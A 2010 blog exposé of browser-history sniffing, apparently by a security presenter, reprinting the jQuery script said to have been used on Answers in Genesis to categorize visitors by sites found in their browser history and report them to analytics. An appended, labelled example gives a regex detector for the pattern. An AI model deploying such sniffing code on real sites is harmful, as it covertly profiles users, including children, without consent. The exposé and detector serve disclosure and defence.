Answers in Genesis Wants Your Secrets

By Virgil - Posted on 04 December 2010

Just a few months ago I did a short presentation at the Ohio Information Security Forum on the dangers of CSS and JavaScript browser history hijacking, with an actual demonstration of how your web browser's history can be parsed for interesting data for the purpose of harvesting information about your browsing habits.

A while back a team from the University of California, San Diego, came out with a white paper titled "An Empirical Study of Privacy-Violating Information Flows in JavaScript Web Applications". The team compiled a list of websites which are using the JavaScript history hijacking technique, including Answers in Genesis in the list of evaluated sites, along with many other websites serving pornography, malware and other malicious content. AiG did not use the CSS-only technique I presented at OISF and only focused on JavaScript+CSS, meaning that a user who had JavaScript turned off in his browser would have been safe from this kind of attack.

Simply put, this technique works by presenting a list of known values (in this instance websites and URLs) to the browser as links. Executed code then checks each link against the browser's history, using something like the "statExternalLinks" element, and determines from the link color (via CSS) whether or not the presented URL was previously visited by the user. This is not so much a vulnerability as it is a "feature" that is being used by abusive websites.

Below is the code that someone saved from AiG's website; as of today it appears that they are no longer using this intrusive approach, but the fact that they have used this extensively until recently is certainly not a good sign:

$(document).ready(function() {
  var cookie = $.cookie('__utmv');

  $("body").append("" +
    // WEB2.0 USERS
    "delicious" +
    "googledocs" +
    "digg" +
    "stumbleupon" +
    "twitter" +
    // COMMUNITY USERS
    "facebook" +
    "myspace" +
    "secondlife" +
    // CREATIONIST GROUPIES
    "icr" +
    "drdino" +
    "cmi" +
    "crsq" +
    // EVOLUTION NEWS FOLLOWERS
    "newscientist" +
    "sciam" +
    "scienceblogs" +
    "pzmeyer" +
    "talkorigins" +
    "dawkins" +
    "ncse" +
    // ID FOLLOWERS
    "uncommondescent" +
    "evonews" +
    // MEDIA JUNKIES
    "youtube" +
    "godtube" +
    "flickr" +
    "picasa" +
    "vimeo" +
    "hulu" +
    "movietrailers" +
    // ONLINE SHOPPERS
    "amazon" +
    "ebay" +
    "craigslist" +
    "barnesnoble" +
    "walmart" +
    "target" +
    // "CHRISTIAN" USERS
    "macarthur" +
    "sermonaudio" +
    "christiananswers" +
    "biblegateway" +
    "focus" +
    "pluggedin" +
    "coralridge" +
    "crosswalk" +
    "oneplace" +
    "visionforum" +
    "ct" +
    "castingcrowns" +
    // KIDS USERS
    "webkinz" +
    "veggietales" +
    "cartoonnetwork" +
    "qubo" +
    "lego" +
    "mylego" +
    "disney" +
    "mydisney" +
    "clubhouse" +
    "whitsend" +
    "cbh" +
    "kids4truth" +
    // OTHER
    "museum" +
    "wired" +
    "wikipedia" +
    "joelosteen" +
    "beliefnet" +
    "");

  var userVars = '';
  if (cookie != undefined) userVars = cookie.split(".")[1];

  $("#statExternalLinks a").each(function() {
    var curSite = $(this).text();
    var color = $(this).css("color");
    if (userVars.indexOf(curSite) == -1 &&
        (color == "rgb(130, 129, 207)" ||
         color == "#8281CF" ||
         color == "#8281cf")) {

      if (userVars.length > 0) userVars += "|";
      userVars += curSite;

    }
  });
  $("#statExternalLinks").remove();
  pageTracker._setVar(userVars);
});

Note the websites AiG looked for in browsers' history in order to "categorize" users.

Interesting indeed.
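
A defender-side check for the pattern described above, as an added example that is not part of the original post or of AiG's code: a static heuristic that flags scripts which loop over links, read their rendered color and compare it to a hard-coded value. The signal names, verdict labels and the benign sample are assumptions constructed for illustration.

```javascript
// Added example: static heuristic for the link-color history-sniffing pattern.
// Signal names and the verdict rule are assumptions made for this illustration.
const SIGNALS = {
  // Selects anchor elements (selector is "a" or ends in " a").
  iteratesLinks: /(?:\$|querySelectorAll)\(\s*["'](?:[^"']*\s)?a["']\s*\)/,
  // Reads (not sets) the rendered color of an element.
  readsColor: /\.css\(\s*["']color["']\s*\)|getComputedStyle\([^)]*\)\s*\.color/,
  // Compares something against a hard-coded color literal.
  comparesLiteral: /[=!]==?\s*["'](?:rgb\([\d\s,]+\)|#[0-9a-fA-F]{3,6})["']/,
  // Ships a value to analytics, a cookie, or a request.
  exportsResult: /_setVar\s*\(|document\.cookie\s*=|XMLHttpRequest|fetch\s*\(/,
};

function auditScript(source) {
  const hits = {};
  for (const [name, re] of Object.entries(SIGNALS)) hits[name] = re.test(source);
  // All three probe signals together are what distinguishes sniffing from styling.
  const probes = hits.iteratesLinks && hits.readsColor && hits.comparesLiteral;
  const verdict = !probes ? "clean" : hits.exportsResult ? "sniff+export" : "sniff";
  return { verdict, hits };
}

// Sample 1: the detection loop quoted from the snippet on this page.
const pageSnippet = `
$("#statExternalLinks a").each(function() {
  var curSite = $(this).text();
  var color = $(this).css("color");
  if (userVars.indexOf(curSite) == -1 &&
      (color == "rgb(130, 129, 207)" || color == "#8281CF")) {
    userVars += curSite;
  }
});
$("#statExternalLinks").remove();
pageTracker._setVar(userVars);`;

// Sample 2 (constructed): a theme script that sets link color and a cookie.
const benignSnippet = `
$("nav a").each(function() { $(this).css("color", "#336699"); });
document.cookie = "theme=blue";`;

console.log(auditScript(pageSnippet).verdict);
console.log(auditScript(benignSnippet).verdict);
```

Pattern matching of this kind is easy to evade by renaming or obfuscating the script, so treat a "clean" verdict as absence of the obvious form only.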